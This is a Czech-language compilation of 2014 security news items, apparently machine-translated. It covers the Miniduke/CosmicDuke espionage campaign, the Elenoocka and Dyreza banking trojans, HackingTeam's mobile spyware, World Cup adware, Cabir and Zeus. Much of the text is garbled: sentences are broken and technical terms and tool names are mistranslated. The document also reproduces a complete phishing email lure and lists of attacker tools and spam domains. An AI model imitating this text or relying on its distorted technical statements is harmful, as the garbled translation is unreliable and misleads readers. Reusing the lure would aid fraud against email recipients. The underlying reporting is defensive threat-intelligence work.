Každá oběť je přiřazeno jedinečné ID, takže je možné, aby se zasadila konkrétní aktualizací pro jednotlivé oběti. Jak již bylo uvedeno, Miniduke / CosmicDuke je chráněn vlastní popletl nakladačem, který silně pohlcuje zdroje CPU po dobu 3-5 minut před předáním provedení do užitečného zatížení. To není jen komplikuje analýzu malware, ale je také používán vypustit prostředky vyhrazené na provedení v emulátory integrovány do bezpečnostního softwaru. Kromě vlastní obfuscator, to dělá těžké použití šifrování a komprese na základě RC4 a LZRW algoritmů resp. Implementace těchto algoritmů má drobné odlišnosti od standardizovaného kódu, který možná vypadá jako chyba v kódu. Přesto věříme, že tyto změny byly zavedeny na účel omyl výzkumných pracovníků.
Jeden z více technicky pokročilé částí Miniduke je ukládání dat. Vnitřní uspořádání malware je šifrována, stlačený a serializovat jako komplikované registru-jako struktura, která má různé typy záznamů, včetně řetězce, celá čísla a interní odkazy.
Kromě toho, Miniduke používá neobvyklý způsob pro ukládání dat exfiltrated. Pokud je soubor nahrán na serveru C & C je rozdělen na malé kousky (~ 3 kb), které jsou komprimován, zašifrována a umístí do nádoby, které mají být nahrány na server. Pokud je zdrojový soubor je dostatečně velká, může být umístěn do několika set různých kontejnerů, které jsou nahrány samostatně. Tyto datové bloky jsou pravděpodobně analyzovat, dešifrovat, vybalil, extrahovány a znovu na útočníka straně. Tato metoda se používá nahrát screenshoty pořízené na počítači oběti. Vytvoření tak složitý skladování může být hlavou; Nicméně, všechny ty vrstvy další zpracování zaručuje, že jen velmi málo výzkumníci dostanou do původních dat a zároveň nabízí vyšší spolehlivost proti chybám v síti.
Oběť geografie a profily
Na základě naší analýzy, oběti Miniduke a CosmicDuke spadají do těchto kategorií:
vláda diplomatický energie telekomunikační operátoři vojenské, včetně vojenských dodavatelů osoby podílející se na provozu a prodeje nelegálních a regulovaných látek Z jednoho ze starého stylu servery Miniduke jsme byli schopni získat seznam obětí a jejich příslušných zemích. Byli jsme schopni identifikovat oběti ve třech z těchto zemí, které patřily do kategorie "vlády" . Zde je seznam zemí postižených:
Austrálie Belgie Francie Německo Maďarsko Nizozemí Španělsko Ukrajina Spojené státy Jedním ze serverů CosmicDuke jsme analyzovali měl dlouhý seznam obětí se datuje do dubna 2012. Tento server měl 265 jedinečné identifikátory přiřazené k obětem z 139 unikátních IP adres. Zeměpisné rozložení obětí byl takto (TOP 10):
84 Gruzie 61 Rusko 34 Spojené státy 14 Spojené království 9 Kazachstán 8 Indie 8 Bělorusko 6 Kypr 4 Ukrajina 4 Litva
Podle naší analýzy, útočníci byli větší zájem o rozšíření své činnosti a naskenovaný IP rozsahy a servery v Ázerbajdžánu, v Řecku a na Ukrajině .
Command a analýzy řízení serveru a hacking nástroje
Během analýzy jsme byli schopni získat kopii jednoho z velení a řízení serverů CosmicDuke. Zdá se, že byl také použit pro jiné operace ze strany členů skupiny, včetně nabourávání do jiných serverech na internetu.
Útočníci nasadili řadu veřejně dostupných hackerských nástrojů na tomto serveru, aby bylo možné skenovat a kompromisní webové stránky oběti organizací, jakož i shromažďování informací pro budoucí cílených útoků.
Zde je seznam hackerské nástroje nalezené na serveru:
Hydra : "velmi rychlý síťový přihlašovací cracker, který podporuje mnoho různých služeb"
Fierce2 : "semi-lehký výčet skener, který pomáhá penetrační testery najít non-souvislý IP prostor a hostitelů zadaný domén na věci, jako je DNS, Whois a Arin"
Kombajn : "Cílem tohoto programu je získat e-maily, subdomény, počítače, jména zaměstnanců, otevřené porty a bannery z různých veřejných zdrojů, jako jsou vyhledávače, PGP klíčových serverů a SHODAN počítačové databáze"
RitX : "Reverse IP Lookup Tool, který bude vám umožní použít IP adresu nebo název domény identifikovat všechny aktuálně domény hostované na serveru pomocí více služeb a různé techniky"
Joomscan : "Vulnerability Scanner OWASP Joomla!"
Ncrack : ". Vysokorychlostní síťový autentizační praskání nástroj Umožňuje rychlé, ale spolehlivé rozsáhlé prověřování více počítačů"
Sqlmap : "open source penetrační testování nástroj, který automatizuje proces detekce a využití SQL injection chyby a převzetí databázových serverů"
Poznámka: popisy nástrojů byly zkopírovány z jejich veřejných internetových stránek
Uveďte autora a artefakty, spojení s ostatními kampaněmi
Přestože útočníci používají angličtinu na několika místech, což naznačuje, znalost tohoto jazyka, existují určité indikátory, které by naznačovaly, že nejsou rodilí mluvčí angličtiny.
Následující řetězce byly objeveny v bloku paměti připojené k malware komponenty používané pro vytrvalost:
www.mirea.ru e.mail.ru gmt4 c: \ documents and settings \ владимир \ Local Settings \ ...
Hostitelé C & C se zdá, že byl napaden útočníky, které nahráli konkrétní Webshell.
Webshell Miniduke útočníků "na hacknuté hostitelů
Pro Webshell, to je zajímavé poukázat na použití Codepage 1251, který se běžně používá k tomu, aby znaky cyrilice. Heslo slouží k ochraně shell, se kontroluje proti MD5 hash " 35c7c2d1fe03f0eeaa4630332c242a36 ". (BTW: můžete ho rozlousknout nám to trvalo několik dní, aby to vyřešit?!)
Možná stojí za zmínku říci, že stejná Webshell byl pozorován v provozu další pokročilé ohrožení herec známý jako Turla, Snake nebo Uroburos.
Dalším zajímavým aspektem je, že ladění cesta struny z malware, které ukazují několik sestavení prostředí nebo skupiny "uživatelů" na "Bot Gen Studio", "Nitro" a "Nemesis Gemina":
Na kompilaci časových základě, jsme byli schopni dát dohromady následující graf ukazující aktivitu útočníků Miniduke / CosmicDuke na "den v týdnu" základě:
Zdá se, že útočníci dodržovat pracovní týden Po-Pá, nicméně, oni pracují o víkendech čas od času.
Pokud jde o aktivity hodin, útočníci zdá se, že funguje mezi 6 hodin ráno a devatenáct hodin GMT. Většina práce se provádí mezi 6 hodin ráno a šestnáct hodin ačkoli.
Závěry
I když se zastavil, nebo v intenzitě po našem oznámení v minulém roce alespoň snížil, útoky Miniduke jsou nyní zpět v platnosti. Starý styl Miniduke malware je stále používán, nasazení dříve známé etapy zabalené s novým obfuscator pozorované s tajemným "Bot Gen Studio" pro "Nitro" a projekty "Nemesis Gemina".
Zatímco starý styl Miniduke implantáty byly použity k cíli většinou vládní oběti, nový styl CosmicDuke implantáty mají nějak odlišné typologii obětí. Nejneobvyklejší je zaměření na jednotlivce, které se zdají být zapojen do provozu a dalšího prodeje z kontrolovaných a zakázaných látek, jako jsou steroidy a hormony. Tyto oběti v NITRO projektu byly pozorovány pouze v Rusku. Jednou z možností je, že "Bot Gen Studio" je malware platformu k dispozici také jako tzv. "právní spyware" nástroj, podobně jako ostatní, jako HackingTeam je RCS, široce používané donucovacími orgány. Další možností je, že to je prostě k dispozici v podzemí a koupil různých soutěžitelů ve farmaceutickém průmyslu špehovat na sebe.
Současně, projekt "Nemesis Gemina" se zaměřuje na vládní, diplomatických, energie, vojenských a telekomunikačních operátorů.
Jednou z velkých otázek, zde je: Jsou útočníci Miniduke stále "elita"? I když staré malware je ještě v použití, nový malware je již čistý assembler; místo, je to napsáno v C / C + +.
Nové vzorky Miniduke / CosmicDuke použít silný Obfuscator. Pro téměř všechny vzorky jsme analyzovali, že skočí na začátek dynamického PE loader - vždy ze stejného "l33t" adresa (je-li rozložení paměti povoleno ji během bot stavby):
Proto, dalo by se říct, že CosmicDuke je stále "l33t"!
V ČR řádil bankovní malware Elenoocka, obětí přibývá
14.7.2014 Viry Globální analytická síť Threat Sense společnosti Eset zaznamenala v červnu v České republice další vlny útoků, šířících trojského koně typu downloader.
Trojan, popsaný v laboratořích společnosti Eset jako Win32/TrojanDownloader.Elenoocka, představoval koncem června až 40 % ze všech hrozeb, zachycených v Česku. Jeho úkolem je stahovat do napadeného počítače další malware. Elenoocka se šíří v příloze spamových zpráv, které obsahují falešné upozornění banky na údajný dluh. Příloha, maskovaná jako .zip archiv, obsahuje spustitelný .exe soubor.
Spamové kampaně šířící tohoto trojana začaly již v dubnu 2014. Internetoví podvodníci sice nejsou příliš vynalézaví a tyto kampaně mají stále stejnou podobu, ale obětí přesto přibývá. Objevily se první případy, kdy trojan Elenoocka úspěšně nainstaloval do počítače malware, který dokáže krást hesla, předstírat prostředí internetového bankovnictví a přimět uživatele, aby si na mobil nainstaloval údajnou bezpečnostní aplikaci. Výsledkem je příkaz k převodu – typicky jde o částku těsně pod hranicí 200 tisíc korun - který za uživatele zadal a zaslaným kódem potvrdil operátor, najatý zločineckým gangem kdesi na Východě. Nejfrekventovanější červnovou hrozbou byl v Česku trojan HTML/Fraud. Podobně jako Elenoocka je to hrozba, která je specifická pro ČR.
Globálně nejrozšířenější počítačovou hrozbou je podle Esetu po měsíční přestávce opět červ Win32/Bundpil. Šíří se prostřednictvím přenosných médií a snaží se stahovat ze zadaných adres další malware.
Malware analýza s pedump
9.7.2014 Viry
Hledáte nástroj k analýze Windows Portable spustitelné soubory (PE)? Zvažte použití pedump binární analyzátor soubor ruby win32 PE. V současné době podporuje DOS MZ EXE, Win16 NE a win32/64 PE.
Existuje několik způsobů, jak nainstalovat balíček ruby; Nicméně, nejjednodušší způsob je použít příkaz " gem install pedump "z linuxové stanici. Můžete si také stáhnout soubor zde nebo použijte pedump webové stránky nahrát soubor k analýze. Tento příklad ukazuje výstup z webové stránky pedump.
Můžete získat stejné výsledky jako tento výstup s verzí příkazového řádku příkazem " pedump - všechny SetupCasinoRoyal.exe ".
Verze pro příkazový řádek v současné době nemá řadě hexdump nebo funkci disassembler. Nicméně, můžete získat stejný hexdump výstup provedením " hexdump-C SetupCasinoRoyal.exe "z vašeho systému Unix.
Tento nástroj poskytuje snadný způsob, jak vylít záhlaví, najít balírny a prostředky používané exe a dll, nakonec poskytuje rychlý pohled dovnitř podezřelého souboru PE.
30.6.2014 Viry Národní bezpečnostní tým CSIRT.CZ v pondělí varoval před novou vlnou nevyžádaných e-mailů, ve které počítačoví podvodníci straší příjemce tisícovými dluhy. Tentokrát jsou však snahy kyberzločinců sofistikovanější než kdy dříve – s novým virem obsaženým ve zprávě si totiž antivirové programy nedokážou Poprvé se tento typ útoku objevil v Česku už koncem dubna. Podvodné zprávy ze druhé vlny se těm předchozím podobají jako vejce vejci. V textu podvodníci tvrdí, že příjemce dluží značnou částku, a pokud ji neuhradí, bude „zahájena právní sankce na základě pohledávky“.
Součástí e-mailu je i příloha, která má obsahovat údajnou smlouvu, jež dokazuje vznik dlužné částky. Místo toho se však v archivu ukrývá spustitelný soubor s koncovkou .exe, který kromě textového dokumentu obsahuje také počítačové viry.
Uživatelé jsou zatím odkázáni pouze na vlastní obezřetnost. bezpečnostní analytik Pavel Bašta z týmu CSIRT.CZ Právě nová verze viru dělá bezpečnostním expertům vrásky na čele. „Antivirové společnosti zatím neidentifikují tuto novou verzi viru, a uživatelé jsou tak zatím odkázáni pouze na vlastní obezřetnost. Důrazně proto varujeme uživatele před spouštěním přílohy u této zprávy,“ varoval bezpečnostní analytik Pavel Bašta z týmu CSIRT, který je provozován sdružením CZ.NIC.
Scénář útoku je tedy kromě nového viru zcela totožný s předchozími vlnami.
Podle ohlasů čtenářů Novinek se internetové adresy, ze kterých podvodníci odesílají zprávy, často mění. Objevily se mezi nimi například domény bexte-reality.cz, nerodia.cz, erika-as.cz nebo skaconspiracy.cz.
Že se jedná o podvod, je patrné už na první pohled podle špatně skloňovaných slov a dalších chyb, které se v česky psaném e-mailu objevují.
Text podvodného e-mailu Vážený zákazníku, Jsme velmi rádi, že jste využívali produktu z naší banky. Dovolujeme si Vás upozornit na dlužná částku ve výši 8031.56 Kč, ke dni 24.04.2014 na osobním účtě #1143203552366118 . Nabízíme Vám uhradit pohledávku v plné výši do 28.05.2014. Dobrovolné uhrazení pohledávkya dodržení smlouvy #62369B7812F797489 umožňujeme Vám: 1) Dodržet pozitivní úvěrovou historii 2) Vyhnout se soudním sporům, placení poplatků a jiných soudních nákladů. V případě prodlení úhrady pohledávky 8031.56 Kč v souladu s platnými právními předpis, jsme oprávněni zahájit právní sankci na základě pohledávky. Kopie smlouvy a platební údaj jsou připojeny k tomuto dopisu jako soubor "smlouva_62369B7812F797489.zip" S pozdravem, Vedoucí odboru vymáhání pohledávek Anna Farářová
Malware je přítomný u sedmnácti z dvaceti firem, tvrdí výzkumníci
27.6.2014 Viry Meziročně aktivita škodlivého kódu podle analytiků dramaticky vzrostla. škodlivý software je podle studie Check Pointu v 84 % organizací, v průměru byl tento škodlivý kód stažen každých deset minut.
Security Report 2014, který se zaměřuje na hlavní trendy v oblasti kybernetických hrozeb ovlivňujících organizace po celém světě, představil Check Point. Základem je detailní analýza dat, během které bylo zpracováno více než 200 000 hodin monitoringu provozu sítí z více než 9 000 bezpečnostních brán napříč organizacemi ze 122 zemí.
14 % organizací zaznamenalo v roce 2012, že zaměstnanci stáhli škodlivý kód každé dvě hodiny nebo ještě častěji, v roce 2013 se tento počet zvýšil více než třikrát na 58 % organizací.
Senzory pro emulaci hrozeb odhalily, že 33 % organizací stáhlo v období mezi červnem a prosincem 2013 alespoň jeden soubor infikovaný neznámým malwarem, přičemž 35 % z těchto infikovaných souborů bylo ve formátu PDF.
Nové nástroje označované jako „Crypters“ umožňovaly tvůrcům malwaru obejít detekční technologie používané antimalwarovými programy.
Boty útočí Infekce boty se dále šířila, nové boty byly identifikovány v průměru každých 24 hodin. V průběhu roku 2013 byl alespoň jeden bot odhalen v 73 % sledovaných organizací, zatímco v roce 2012 to bylo pouze 63 %. Studie dále zjistila, že 77 % botů bylo aktivních déle než čtyři týdny a boti navíc komunikovali s velícím a řídícím (C&C) serverem každé tři minuty.
Také používání vysoce rizikových aplikací je ve firmách stále běžnější. Aplikace, jako jsou torrenty, nástroje pro anonymní surfování či P2P aplikace pro sdílení souborů používají zaměstnanci v průměru každých devět minut.
V roce 2012 byly P2P aplikace pro sdílení souborů používané v 61 % organizací, v roce 2013 to už bylo v 75 % společností. Navíc v 56 % organizací zaměstnanci používali nástroje pro anonymní surfování, o rok dříve to bylo pouze ve 43 % společností.
Vědci dovnitř HackingTeam Mobile Malware, Command infrastruktury 25.6.2014 Viry
Kontroverzní spyware komerčně vyvinutý v Itálii HackingTeam a prodával vlády a prosazování práva pro účely dozoru, má globální velení a řízení infrastruktury a poprvé, bezpečnostní experti mají vhled do toho, jak své mobilní malware komponent práci.
V průběhu akce v Londýně Spolupracující týmy výzkumných pracovníků ze společnosti Kaspersky Lab a Citizen Lab na Munk School of Global Affairs na univerzitě v Torontu dnes informovala o svých zjištěních. Šířka příkazového infrastruktury podporující systém dálkového ovládání HackingTeam je (RCS) je rozsáhlá, s 326 servery odhalen ve více než 40 zemích světa; Zpráva také obsahuje první podrobnosti o vnitřní fungování mobilních komponent RCS pro Apple iOS a Android zařízení.
Nové moduly umožňují vládám a policisty s rozsáhlými možnostmi sledování více obětí, včetně možnosti podat zprávu o jejich umístění, ukrást data z jejich zařízení, použijte mikrofon zařízení v reálném čase, zachytit hlasové a SMS zprávy odeslané prostřednictvím aplikací, jako je Skype , WhatsApp, Viber, a mnohem více.
"Byl to dobře známý fakt nějakou dobu, že produkty HackingTeam součástí malware pro mobilní telefony. Nicméně, tito byli zřídka, "řekl odborníky společnosti Kaspersky Lab na Securelist blogu . HackingTeam, že vědci, i vestavěné moduly pro Windows Mobile a BlackBerry. "Zejména Android a iOS trojské koně nikdy nebyly zjištěny dříve a představoval jeden ze zbývajících prázdných míst v příběhu."
V návaznosti na výzkum propuštěn v březnu, který ukázal, že nejméně 20 procent infrastruktury podporující Dozor pomocí Remote Control System HackingTeam je (RCS), byl umístěn v tuctu amerických datových center, dnešní zpráva ukazuje, RCS "masivní dosah po celém světě pomáhajících úředníky v cílení obětí včetně novinářů, politiků, obhájců lidských práv, a další.
"Přítomnost těchto serverů v dané zemi, neznamená, že se říká, že jsou používány činnými v trestním řízení, že jednotlivé země. Nicméně, to dává smysl, že uživatelé RCS nasadit C & Cs v lokalitách, které kontrolují - tam, kde jsou minimální rizika přeshraničních právních problémů nebo serveru záchvaty, "řekl Sergej Golovanov, hlavní bezpečnostní výzkumník u společnosti Kaspersky Lab.
Golovanov a Morgan Marquis-Boire z Citizen Lab prezentoval výzkum dnes v Londýně, a řekl, že většina příkazů serverů hostil ve Spojených státech, Velké Británii, Kanadě, Ekvádoru a Kazachstánu. Výzkumníci z obou týmů reverzní inženýrství malware vzorky, specifické ukazatele kompromisních a připojení dat k identifikaci umístění velení a řízení infrastruktury po celém světě.
RCS, také známý jako Galileo, je inzerován HackingTeam jako roztok schopný porazit šifrovací technologii znamenal pro zabezpečení komunikace a dat. Tento software je prostředek na bázi a je tajně nainstalován na zařízení oběti; ukradl data jsou odeslána šifrována zpět do příkazového serveru.
Kaspersky Lab říkal, že toto je poprvé, kdy mobilní moduly iOS a Android jsou členité. Kaspersky Lab uvádí se v prohlášení, že její výzkumníci hledali na RCS vzorků malwaru na dva roky a byli schopni odpovídat na mobilních modulů do jiných konfiguračních malware profilů RCS, že si shromažďovány, jakož i další vzorky z Citizen Lab.
Mobilní implantáty, uvádějí vědci, jsou na zakázku postavený pro každý cíl a vložen do zařízení.
"Jakmile je vzorek připraven, útočník doručí ji do mobilního zařízení oběti. Některé ze známých infekčních vektorů zahrnují spearphishing pomocí sociálního inženýrství - často spojený s exploity, včetně nulových dnů; a lokální infekce přes USB kabel při synchronizaci mobilních zařízení, "řekl Kaspersky Lab v prohlášení.
Vezmeme hlubší ponor do malware, Kaspersky a Citizen Lab zjistila, že iOS verze RCS trojské koně zasáhne pouze jailbroken zařízení. Pristine iPhone jsou také zranitelné, pokud útočník může vzdáleně spustit Jailbreaking nástroj jako Evasi0n a pak načíst malware implantát.
Modul iOS má dlouhý seznam možností, včetně dohledu nad e-mailu, SMS, MMS, webové historie, adresáře, historie volání, klávesy a schopnost používat i živé mikrofon a kameru.
"Tajně aktivaci mikrofonu a při pravidelné záběry z fotoaparátu zajišťuje konstantní dohled nad cíl, který je mnohem silnější než tradiční pláště a dýky operací," řekl Kaspersky Lab v prohlášení.
Android modul, mezitím, je chráněn obfuscator pro Android s názvem DexGuard, že z analýzy náročné. Většina schopností iOS jsou také k dispozici pro Android, kromě podpory pro únos aplikace jako Facebook, Google Talk, Tencent Číny a dalších.
"Mobilní moduly RCS jsou pečlivě navrženy tak, aby provoz v diskrétním způsobem, například tím, že věnují zvláštní pozornost životnost baterie mobilního zařízení," řekl Kaspersky Lab. "To je realizován prostřednictvím pečlivě přizpůsobené schopnosti špionáže, nebo speciální spouštěče: například zvukový záznam může začít pouze tehdy, když je oběť připojena na konkrétní síti Wi-Fi (například síť mediálního domu), nebo když / ona změní SIM kartu, nebo při nabíjení přístroje. "
Adware nebo peněžní ztrátu namísto své oblíbené hry Světového poháru 21.6.2014 Viry
Jedná se o čtvrtý a poslední díl našeho seriálu o blogposts o mistrovství světa a IT hrozeb s ním spojené. Navíc, to jsou problémy, které jsme právě teď čelíme, zatímco naše fotbalové hvězdy jsou vykračoval své věci v Brazílii.
Mnoho fanoušků se ocitli daleko od televizoru a hledal live stream velkého hry - ale hledá pro živé vysílání na internetu vám může stát peníze, nebo opustit nebezpečný program na vašem počítači.
Při hledání na internetu pro živé vysílání Word Cup, budete někdy najít nakoupené reklamy, které vedou k podvodné nebo škodlivým obsahem. Zde jsou dva čerstvé příklady toho, vše nastavit na mistrovství světa:
Když jdete na webové stránky, to se vás zeptá ke stažení je k dispozici pro všechny prohlížeče speciální plugin. To má být hráč potřeba se dívat na vysílání on-line z her:
Ve skutečnosti, to je adware program, který se nemusí ukázat vám nic jiného, než se odtok prostředků vašeho počítače. Adware software rozkročí tenkou hranici mezi klasické počítačové trestné činnosti a legitimní software. To je důvod, proč naše statistiky ukazují konstantní detekce rostou na stejná na zařízení uživatele:
Stránky jako je to také slibují zobrazit všechny akce na mistrovství světa:
Stránky nabízejí každou hru, kdykoliv. Slibují vysoce kvalitní záběry převzaté z nejlepších fotoaparátů v arénách. Samozřejmě, že všechny kreditní karty jsou přijímány!
Nicméně, pokud budete platit budete jen ztratit své peníze. Pochybné a nepoctivé stránky jako jsou tyto, nemají zájem hrát podle všech pravidel.
Jeden Posledním důležitým bodem je každý den vidíme spoustu nových registrovaná doménová jména obsahující slova jako "Mistrovství světa ve fotbale Živé kouřící 2014". Věříme, že většina z nich bude použita pro zlomyslné účely.
Počítačoví zločinci, oportunisté a jiné škodlivé jednotlivci hledají příležitosti, jako je mistrovství světa. Vědí, že to je nejlepší čas na podvádět lidi, krást peníze a infikovat jejich zařízení. Zůstaňte náskok a nespadají do jejich pasti sociálního inženýrství. Při procházení a hledání obsahu Použijte tu nejlepší ochranu proti malware a udržet svůj důvtip o vás. Mimochodem, pokud chcete vidět živé vysílání, pravděpodobně můžete použít jeden z těchto legitimních rad.
Dyreza Banker Trojan Seen Obcházení SSL 17.6.2014 Viry Banker trojské koně se ukázaly jako spolehlivé a účinné nástroje pro útočníky, kteří jsou do tiše krade velké množství peněz z nic netušících obětí. Zeus, Carberp a mnoho dalších z hromady peněz na jejich tvůrce a útočníků, kteří je používají, a vědci se při pohledu na novější bankéř Trojan, který má schopnost obejít ochranu SSL pro bankovní relace přesměrování provozu přes vlastní útočníků " domény.
Trojan, který se nazývá buď Dyre nebo Dyreza výzkumníky, používá techniku známou jako prohlížeče hákování zachytit provoz proudí mezi stroji oběti a na webové stránce cílovou. Malware přijede do schránek uživatelů pomocí spamových zpráv, z nichž mnohé bude vypadat zprávy od finanční instituce. Seznam cílových bank patří Bank of America, natwest, Citibank, RBS a Ulsterbank. Vědci říkají, že hodně z činnosti z Trojan dosud je ve Velké Británii
Když se oběť otevře připojený soubor ZIP ve zprávě spam, malware instaluje na počítači a pak kontaktů příkaz-a-ovládání serveru. Vědci z CSIS v Dánsku se nachází pár z C2 serverů a zjistil, že jeden z nich měl integrovaný peněz mezek panel pro několik účtů v Lotyšsku. Cílem malware, samozřejmě, pokud se ukrást přihlašovací údaje uživatelů pro on-line bankovnictví a dalších finančních stránkách. Různé bankéř trojské koně jít o to různými způsoby, a tvůrci Dyreza rozhodli zaměstnat prohlížeče zásek pomoci porazit SSL.
Různé bankéř trojské koně jít o to různými způsoby, a tvůrci Dyreza rozhodli zaměstnat prohlížeče zásek pomoci porazit SSL. "Provoz, při procházení Internetu, je řízen útočníků. Oni používají MITM (Man in the Middle) přístupu, a proto jsou schopni číst cokoli, dokonce i SSL komunikaci ve formátu prostého textu. Tímto způsobem budou také snažit obcházet 2fa, "je analýza Petera Kruse v CSIS říká.
Když uživatelé zajít do jedné z cílených finančních stránkách a pokusit se přihlásit, data zachycuje malware a odeslán přímo do útočníků. Oběti by neměla mít žádné vizuální narážky, že jejich data jsou odčerpávány nebo že malware je přesměrování jejich provoz na doméně řízené útočníků, a to již zašifrována.
"Tady je kicker. To vše by mělo být šifrované a nikdy vidět jasné. Pomocí kejkle, útočníci, aby to vypadalo, že jste stále na webových stránkách a pracuje jako HTTPS. Ve skutečnosti je váš provoz přesměrován na stránku útočníků, "další analýza říká Ronnie Tokazowski z PhishMe.
"Chcete-li úspěšně přesměrovat provoz tímto způsobem, útočníci potřebují mít možnost vidět provoz před šifrování, a v případě prohlížečů, toto je děláno s technikou zvanou prohlížeč hákování. Žádné DNS dotazy byly provedeny pro c1sh Bank of America domény, což naznačuje, že útočníci jednoduše připojí toto pole hostitele v síti. "
Dyreza malware má schopnost připojit Google Chrome, Mozilla Firefox a Internet Explorer.
Tvůrci Dyreza rozhodli zaměstnat prohlížeče zásek pomoci porazit SSL.
O deset let později Cabir Worm je místo v historii je jedinečný 17.6.2014 Viry Je těžké si vzpomínám, a zdá se, kuriózní, i když si můžete připomenout to ale byla doba, v ne tak vzdálené minulosti, kdy analytici a bezpečnostní experti se obávají nadcházející mobilní malware apokalypsy. Self-kopírovat malware bude brzy zaplaví naše telefony, mazání naše vytoužené vyzvánění a brání nás všechny z hraní hada .
Mobilní telefony byly považovány za další skvělý výpočetní platformy, a to bylo jen přirozené, že si myslí, že útočníci budou následovat vedení uživatelů a přesunout své zboží své, stejně. Jak to dopadá, smartphony se skutečně stalo významnou součástí výpočetního prostředí s mnoho uživatelů dělá hodně, ne-li všechny, z jejich on-line aktivit na svých telefonech. A útočníci neztrácel čas využil této směny, lovení na mobilní modelu app a blížící se vlny mobilních plateb.
Avšak to, co se nikdy neuskutečnil, je druh mobilního malware, který měl odborníci tak strach před deseti lety. Je to již 10 let, co první nativní mobilní virus, Cabir , se objevil na scéně, a to bylo to, že červ, který pomáhal šířit strach z rozsáhlých smartphone virů. Cabir byla objevena v červnu 2004, a hodně z toho, co následovalo, bylo trochu divné, a off-kilter.
Červ nebyl objeven ve volné přírodě, ale místo toho se objevil v e-mailové schránky Kaspersky Lab byla zřízena sbírat nové vzorky virů. Analytici začal brát kódu sebe a všiml si hned, že malware nebyl určen pro PC, něco, co zpočátku zmatený jim. K čemu byl kus malware, pokud by nemohla infikovat počítače?
K čemu byl kus malware, pokud by nemohla infikovat počítače? "Rychlá analýza ukázala, že je to aplikace pro Symbian OS a také archiv instalátor obsahující jiné soubory. Zpravidla virus analytici zabývat se soubory vytvořenými pro tradiční x86 procesory. Soubory v caribe.sis byly aplikace pro ARM, procesory, které se používají v celé řadě zařízení, včetně mobilních telefonů, "Alex Gostev Kaspersky napsal v analýze pár let později, při pohledu zpět na události.
"Zpočátku jsme věděli jen velmi málo o tom strojového jazyka používaného tímto procesorem, ale během několika hodin se naši analytici podařilo seznámit se s ním. Účelem souborů bylo pak jasné: to byl červ pro mobilní telefony, který se rozšířil přes Bluetooth. Naše závěry se plně potvrdila následující den, kdy jsme testovali červa na Nokia N-Gage telefon se systémem Symbian. "
Jako kdyby byl napsán pro mobilní platformu nebyl natolik zajímavý, Cabir i nějaké jiné zvláštnosti. Konkrétně to nezdálo se, že dělat cokoliv. Většina malware je navržen tak, aby krást informace, mazat data, nebo nějakou kombinaci obou. Cabir udělal ani jeden, ale prostě se snažil najít jiné okolní zařízení a šíří tehdy rodící se technologii Bluetooth. Jakmile se na nové zařízení, je zobrazeno slovo "Caribe" na obrazovce a bude to tak pokaždé, když telefon byl restartován. Červ neměl zlý úmysl, ale vypadal, že je přehlídka síly, důkaz, že někdo tam venku vědět, jak to udělat.
Malware odborníci nikdy nepochyboval, že část; po tom všem, autoři virů se osvědčily na nic, pokud není odolný a vynalézavý v průběhu let. Ale pro malware autorů, klíčový kousek skládačky pořád chybí: důvod k péči o mobilní platformu.
Apple by se dodat, že důvod, proč téměř přesně o tři roky později s vydáním původní iPhone. Vzhledem k impozantním marketingem stroj společnosti šel do nejvyšší rychlostní stupeň, aby se zasadila iPhone, spotřebitelé se seřadili na bloky dostat své ruce na lesklé dotykovou obrazovkou počítače, scény, které by opakovat zhruba jednou za rok s každou novou verzí. A zařízení byly počítače s výkonnými procesory, vestavěným-in app ekosystému, a co je nejdůležitější pro útočníka společenství, spoustou paměti. A že paměť by mohla být použita k ukládání spoustu cenných dat, věci, jako je firemní e-mail s velkými přílohami tuku, finančních dokumentů a prakticky cokoliv jiného uživatele se staral, aby se na palubě.
IPhone a Android zařízení, které rychle následovaly v jeho stopách, také přišel vybavený spoustou komunikačních možností, včetně Bluetooth a Wi-Fi, dává lidem možnost, aby jejich použití jako svých hlavních výpočetních zařízení. A tak se stalo. Což znamenalo, že obrovské množství cenných informací najednou letí vzduchem jen čekají na to být zachycen. Útočníci rychle nastavit o úkol najít způsoby, jak využít tuto novou platformu, a netrvalo dlouho a jejich zaměření na ostřit na app modelu. Vývojáři se snažili tisíce nových aplikací do ekosystému, každý měsíc, mnoho z nich s trochou přemýšlení o zabezpečení, které vedly k předvídatelného problému zranitelných aplikací, Trojaned aplikací a nakonec přímé škodlivé aplikace. Apple a Google bojují tento problém od té doby.
Ale bál vlny self-kopírovat mobilního malwaru nikdy se objevil. Tam byly jiné kousky malware následovat Cabir náskok v následujících letech, neboť debutoval, ale útočník komunita rychle naučil, že tam nebyl velký zisk v tomto modelu. Skutečné peníze, se nachází krádeže dat a zachycení citlivá komunikace, takže všechny akce se přesunula k nalezení nové tvůrčí způsoby, jak dosáhnout těchto úkolů, ať už prostřednictvím škodlivých aplikací nebo jiným způsobem.
Cabir je místo v historii jako první mobilní telefon virus je bezpečný, a s perspektivou času, je vidět, co to bylo: není původ druhů, ale mutace, která by brzy vadnou a umírají.
Cabir je místo v historii jako první mobilní telefon virus je bezpečný.
Všestrannost Zeus rámce vybízí trestní inovace 12.6.2014 Viry Nová zpráva o vývoji Zeus Trojan ukazuje, že malware byl přesunut z těžebních on-line bankovnictví pověření k řízení botnetů a spuštění distribuované popření servisních útoků atributy vývoj na vysoce přizpůsobené a neuvěřitelně všestranný rámec Zeus je dnes. Podle průzkumu , který provedla zabezpečení Prolexic a technický tým odezvy (PLXsert), Zeus zůstává mezi nejsilnější bankovní trojské koně na trhu. Nicméně, protože jeho stále zdrojového kódu velmi skvěle unikly na konci roku 2010, zločinci míru trojan uspokojovat své specifické potřeby. Část, která vedla k tomu, Zeus-řízené botnety a DDoS útoky, ve kterém Zeus přináší užitečné zatížení skládající se z nějakého DDoS malware. Distribuované architektury nedávno vypnutí GameOver Zeus varianty patří mezi příklady tohoto typu úprav. Stále více však zločinci budují vlastní moduly, které nasazení více náklad a útoku. Stále více však zločinci budují vlastní moduly, které nasazení více náklad a útoky, jejichž cílem je zaměřit konkrétní cloudové platformě jako-a-Service (PaaS) a software-as-a-Service (SaaS) infrastruktury. Mnohé z těchto modulů mají dokonce schopnost odhalit přítomnost jiných Zeus variant na infikovaných systémech a dezinfekci těchto systémů v souladu. Bez ohledu na to, k jakému účelu škodlivý nástrojů slouží, to vyžaduje velmi malou dovednost operovat, což drtivá bazény zločinců schopnost zahájit silné útoky. Jako variace Zeus nadále objevují se popletl náklad, hrozba se stává více a více obtížné odhalit a blokovat. Podle zprávy, některé organizace sledující hrozby odhadnout rychlost detekce antivirus pro Zeus je jen 39 procent. Mnoho z vlastních odrůd Dia stále pověření-zloděje. Místo krádeže bankovních pověření, mnozí 